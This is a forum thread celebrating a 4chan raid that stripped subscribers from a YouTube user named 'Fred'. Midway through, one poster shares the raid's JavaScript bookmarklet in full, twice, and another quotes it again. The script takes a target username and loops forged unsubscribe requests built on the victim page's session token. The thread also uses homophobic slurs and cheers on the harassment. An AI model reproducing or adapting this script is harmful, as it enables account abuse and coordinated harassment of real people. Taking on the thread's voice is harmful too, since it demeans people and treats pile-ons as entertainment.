[QUOTE=Ali Legend;24344295][media]http://www.youtube.com/watch?v=TYVmpKmn75U[/media]
What a fucking moron..[/QUOTE]
Why do people always assume it's fucking hackers?
[quote=faggot]hey guys
i'm stratus :smug:[/quote]
[QUOTE=Croix;24344316]Wow and you guys thought I was stupid.[/QUOTE]
you're still stupid
[QUOTE=DiscoBiscut;24344318]no tell nickfury to stop looking like me damn it[/QUOTE]
ngggh
Jesus Christ internet!
I leave you alone for a few hours and look what you do...
...and that is why I love you.
[QUOTE=MrAfroShark70;24344333]Why do people always assume it's fucking hackers?[/QUOTE]
I guess this is technically hacking.
NickFury's jealous beceause he's a furfag. End of story.
[QUOTE=Ali Legend;24344295][media]http://www.youtube.com/watch?v=TYVmpKmn75U[/media]
What a fucking moron..[/QUOTE]
He's obviously a world of warcraft addict SHUTUP TYLERRR
[QUOTE=Ghostwork;24344337]you're still stupid
[/QUOTE]
Fucking 09'ers thinking they're cool.
[highlight](User was banned for this post ("Join date elitism" - Gurant))[/highlight]
i bet that if someone with 100+ subs , makes a video complaining about /b/ , his subs will go to -1500 in less than 1 minute
Did somebody screencap the 4chan thread? I want to read it.
[QUOTE=Hanibal;24344392]i bet that if someone with 100+ subs , makes a video complaining about /b/ , his subs will go to -1500 in less than 1 minute[/QUOTE]
No, because nobody will pay him any attention
[editline]1[/editline]
[QUOTE=W00tbeer1;24344413]Did somebody screencap the 4chan thread? I want to read it.[/QUOTE]
People were saying "VICTORY VICTORY WAY TO GO" and then they were saying "wtf 4chan lost?" when their accounts got disabled
[QUOTE=W00tbeer1;24344413]Did somebody screencap the 4chan thread? I want to read it.[/QUOTE]
Me also.
[QUOTE=W00tbeer1;24344413]Did somebody screencap the 4chan thread? I want to read it.[/QUOTE]
There are probably still a few active ones. I read few several and there was nothing interesting.
[QUOTE=W00tbeer1;24344413]Did somebody screencap the 4chan thread? I want to read it.[/QUOTE]
I concur.
Its increasing, I assume this is part of the plan?
Oh and in case you're interested, these were two of the javascript exploits:
I'm pretty sure they don't work any more so I feel more comfortable posting them (I snipped my post on the first page).
//1
javascript:function unsubscribe() {
httpreq=new XMLHttpRequest();
httpreq.open('post', '/ajax_subscriptions?edit_subscription=newsub&username='+username+'&subscription_level=unsubscribe', false);
httpreq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
httpreq.send('session_token='+yt.getConfig('SUBSCRIBE_AXC'));
if(!httpreq.responseXML) {
setTimeout('unsubscribe()', timeout);
return;
}
if(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue!='<h2>You have successfully unsubscribed.</h2>') {
alert(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue);
} else if((window.status=++count)!=times) {
setTimeout('unsubscribe()', timeout);
} else {
alert('DUN');
}
}
count=0;
if((username=prompt('enter target\'s username', 'Fred'))!=null) {
if(!isNaN(timeout=parseInt(prompt('enter timeout in milliseconds', 250)))) {
if(!isNaN(times=parseInt(prompt('enter num of times to unsubscribe (0 = unlimited)', 0)))) {
unsubscribe();
}
}
}
void(0);
__________________
//2
javascript:function unsubscribe() {httpreq=new XMLHttpRequest();httpreq.open('post', '/ajax_subscriptions?edit_subscription=newsub&username='+username+'&subscription_level=unsubscribe', false);httpreq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');httpreq.send('session_token='+yt.getConfig('SUBSCRIBE_AXC'));if(!httpreq.responseXML) {setTimeout('unsubscribe()', timeout);return;}if(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue!='<h2>You have successfully unsubscribed.</h2>') {alert(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue);} else if((window.status=++count)!=times) {setTimeout('unsubscribe()', timeout);} else {alert('DUN');}}count=0;if((username=prompt('enter target\'s username', 'Fred'))!=null) {if(!isNaN(timeout=parseInt(prompt('enter timeout in milliseconds', 250)))) {if(!isNaN(times=parseInt(prompt('enter num of times to unsubscribe (0 = unlimited)', 0)))) {unsubscribe();}}}void(0);
[QUOTE=Mega Tuna;24344459]Its increasing, I assume this is part of the plan?[/QUOTE]
No, its all over now.
Well, only a few more unsubscribes until he has zero. About 300 right now, it's pretty sick. I'll alert you guys when it reaches zero.
[QUOTE=Ali Legend;24344472]
//2
javascript:function unsubscribe() {httpreq=new XMLHttpRequest();httpreq.open('post', '/ajax_subscriptions?edit_subscription=newsub&username='+username+'&subscription_level=unsubscribe', false);httpreq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');httpreq.send('session_token='+yt.getConfig('SUBSCRIBE_AXC'));if(!httpreq.responseXML) {setTimeout('unsubscribe()', timeout);return;}if(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue!='<h2>You have successfully unsubscribed.</h2>') {alert(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue);} else if((window.status=++count)!=times) {setTimeout('unsubscribe()', timeout);} else {alert('DUN');}}count=0;if((username=prompt('enter target\'s username', 'Fred'))!=null) {if(!isNaN(timeout=parseInt(prompt('enter timeout in milliseconds', 250)))) {if(!isNaN(times=parseInt(prompt('enter num of times to unsubscribe (0 = unlimited)', 0)))) {unsubscribe();}}}void(0);[/QUOTE]
Goddamn that is some messy code.
[QUOTE=Croix;24344367]I guess this is technically hacking.[/QUOTE]
Actually, it's an exploit in the Javascript that Youtube uses.
[QUOTE=Prism;24344496]No, its all over now.[/QUOTE]
Are you sure?
[QUOTE=Ali Legend;24344472]Oh and in case you're interested, these were two of the javascript exploits:
I'm pretty sure they don't work any more so I feel more comfortable posting them (I snipped my post on the first page).
//1
-snip-
__________________
//2
-snip-[/QUOTE]
They are exactly the same :colbert:
[QUOTE=MrAfroShark70;24344509]Actually, it's an exploit in the Javascript that Youtube uses.[/QUOTE]
Exploiting systems in way not intended. Totally not hacking.
Aw shit, ninja'd. I didn't know it was over. Guess I should've read all those pages first.
[QUOTE=Zorus;24344499]Well, only a few more unsubscribes until he has zero. About 300 right now, it's pretty sick. I'll alert you guys when it reaches zero.[/QUOTE]
:lol:
[img]http://img716.imageshack.us/img716/1589/fredlosessubscriberscom.png[/img]
[QUOTE=Croix;24344386]Fucking 09'ers thinking they're cool.[/QUOTE]
Fucking 08'ers assuming that 09'ers think their cool
[QUOTE=Zorus;24344499]Well, only a few more unsubscribes until he has zero. About 300 right now, it's pretty sick. I'll alert you guys when it reaches zero.[/QUOTE]
it wont
Also, I think someone's hacking his friends list too. It shoots up and shoots down.
[QUOTE=LODY;24344540]it wont[/QUOTE]
Don't give up! We must fight!
For Mods, I'm not encouraging raiding, I'm making a joke.
[quote=zorus;24344550]also, i think someone's hacking his friends list too. It shoots up and shoots down.[/quote]
[u][b]haaaaaaaaaaaacking[/b][/u]
Actually, people are fucking with everything on his account.
Sorry, you need to Log In to post a reply to this thread.